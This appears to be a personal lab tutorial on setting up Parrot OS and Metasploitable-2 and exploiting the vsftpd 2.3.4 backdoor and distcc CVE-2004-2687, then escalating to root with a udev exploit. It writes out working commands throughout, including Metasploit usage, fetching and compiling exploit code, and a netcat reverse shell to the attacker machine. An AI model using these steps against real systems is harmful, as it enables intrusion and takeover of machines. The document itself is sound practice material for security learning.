Basic Penetration testing lab — 1
I am setting up a new lab for me and thought to document the process, so anyone who wants to do the same can take references from this post. I am writing this one from scratch and I will also add more parts as I move forward.
Preface
- Downloading all the things.
- Creating Virtual machines
- Configuring Virtual machines
- Reconnaissance
- Exploiting Common vulnerabilities — Metasploitable-2
- Credits
1. Downloading all the Things.
Vmware Fusion 10 — I like the paid version of the Vmware fusion 10 but you guys also use the Virtual box, which is FREE but I highly recommend Vmware fusion 10.
Parrot OS — I am using Kali Linux for a long time, I wanted to try parrot OS because it was recommended by many.
https://metasploit.help.rapid7.com/docs/metasploitable-2
Metasploitable-2 — Metasploitable-2 is vulnerable by birth, it is developed by the rapid7 for practicing on the vulnerable host. DO NOT expose this machine on any prod or sensitive server.
2. Creating Virtual Machines.
Parrot OS
Click on the “Install from disc or image” and locate your ISO and Provide default configs, you can choose the memory and size according to your need.
Provide the location of the Parrot OS.
You can use “live mode” or install. I preferred the Installed version.
Metasploitable-2
The installation process is similar to the ParrotOS.
You can provide the memory and size according to your need but keep in mind. You should keep the host machine in mind during providing custom memory and size.
3. Configuring Virtual Machines
For setting up a penetration testing lab it is important to make the connection between the machines locally. For doing that you have to use the “Bridge Connection” in the network settings.
ParrotOS
Metasploitable-2
4. Reconnaissance
Startup both machines ParrotOS & Metasploitable-2.
Metasploitable-2
Login with the following credentials.
Username: msfadmin
Password: msfadmin
Local IP address for Metasploitable-2 using
ifconfig
Metasploitable-2 local IP: 192.168.10.10
ParrotOS
Login with your credentials.
default credentials for parrotOS
Username: userPassword : toor
Find the IP address for ParrotOS using the following command.
ifconfig
ParrotOS : local IP 192.168.10.5
Port scanning Metasploitable-2 using ParrotOS
nmap -A 192.168.10.10 -oX /home/ehsahil/Desktop/metaspliot2-nmap-scan.xml
the output is in XML format, let's convert it in the more organized way.
for doing this we will use a utility known as “xsltproc” — which will convert the XML into the html.
xsltproc /home/ehsahil/Desktop/metasploit2-nmap-scan.xml -o /home/ehsahil/Desktop/metasploit2-nmap-scan.xml
5. Exploiting Common Vulnerabilities.
Metasploitable — 2
1. Exploiting vsftpd 2.3.4
2. Exploiting Distcc V1 — CVE-2004–2687
1. Exploiting vsftpd 2.3.4.
Aim: Exploit VSFTPD daemon and obtain root access.
Scanning port 21 using nmap.
nmap -sV -p 21 192.168.10.10
port 21 is open and using vsftpd version 2.3.4.
Searching online for the publicly available exploit for this particular version.
vsftp 2.3.4 exploits
Exploiting manually.
ftp 192.168.10.10username: — ehsahil:)
Password — Nothing just enter
PS: smiley emoji :) is important at the end, :) it will be used to trigger the backdoor.
now, we need to listen to port 6200 because backdoor opened the port 6200
nc -vvn 192.168.10.10 6200
Exploiting Using Metasploitable-2.
Start Metasploitable-2 by using the msfconsole command.
msfconsole
Metasploit Commands.
search vsftpduse exploit/Unix/ftp/vsftpd_234_backdoorshow optionsset RHOST 192.168.10.10exploit
Background: This specific version of the vsftpd was infected with a backdoor by an intruder, the developers quickly responded by deleting the backdoor from the code. the users who upgraded to this version were vulnerable to the issue.
the backdoor is initiated when someone adds :) (smiley face) in the username during ftp handshake. then backdoor sets up a bind shell listener on port 6200.
Vulnerable Source code: http://pastebin.com/AetT9sS5
Detailed Source code review:
2. Exploiting Vulnerable DISTCC — CVE-2004–2687
Aim: Getting root access on the machine.
DISTCC V1 is known vulnerable application running on Metasploitable-2 but it is interesting because we have to escalate normal user to root using “Privilege Escalation”
Searching about distcc on online
distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.
distcc running on port 3632
Running nmap against port — 3632
nmap -sV -p 3632 192.168.10.10
Searching for the public exploit for distccd v1
Vulnerable to: CVE-2004–2687
Exploit publicly available. https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
Exploiting using Metasploit
msfconsole
metasploit commands.
search distccuse exploit/unix/distcc_execshow optionsset RHOST 192.168.10.10exploit
Currently, uid=1 and we cannot cat /etc/shadow , This indicated that we don't have root privileges yet.
We need to leverage another vulnerability available in the installed components
for doing that we need to apply recon process to know more about the system.
Seeing all the shells available to us.
cat /etc/shells
GCC — Used for compiling exploits
which gcc
WGET — Used to download the exploit in the vulnerable machine
which wget
lets, see all the running processes.
ps aux
from the above processes, we can move forward to see publicly available exploits.
but, as we are using Metasploitable-2, we already know the vulnerable component, we will use that.
The vulnerable component is “udev”, let's grep for it from the running processes.
Searching for exploits on searchsploit
searchsploit udev
We are interested in the exploit for “local privilege Escalation(2) — /exploits/linux/local/8572.c”
cat /usr/share/exploitdb/exploits/linux/local/8572.c
Exploit usage.
Steps for escalating daemon to root.
- Starting local Apache server — apache2
service apache2 start
2. Coping the exploit into the apache server public directory
Exploit directory — /usr/share/exploitdb/exploits/linux/local/
Apache servers public directory: /var/www/html
sudo /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/ehsahil.c
3. Copying the exploit file into the vulnerable machine using wget.
ParrotOS IP: 192.168.10.5wget 192.168.10.5/ehsahil.c
our exploit code “ehsahil.c” has been copied to /tmp directory.
4. Creating a run file in /tmp directory — required by exploit
touch run #creating run file required by the exploit#bash script to get the reverse shell.
echo '#!/bin/sh' > run
echo '/bin/netcat -e /bin/bash 192.168.10.5 5555' >> run
5. Compiling our exploit code.
gcc ehsahil.c -o ehsahil
6. listening on post 5555
nc -lvnp 5555
7. PID of the udev Netlink socket
cat /proc/net/netlink
PID of the udev Netlink socket = 2718
8. Executable permission to Compiled Exploit.
chmod 755 ehsahil
9. Exploit.
./ehsahil <Netlink-Socket-address>
./ehsahil 2718
Reverse shell obtained.
I will post more metasploitable2 common exploits as I practice them.
Credits
RWB NetSec
Feedback? hit me on twitter @ehsahil
Until Next time.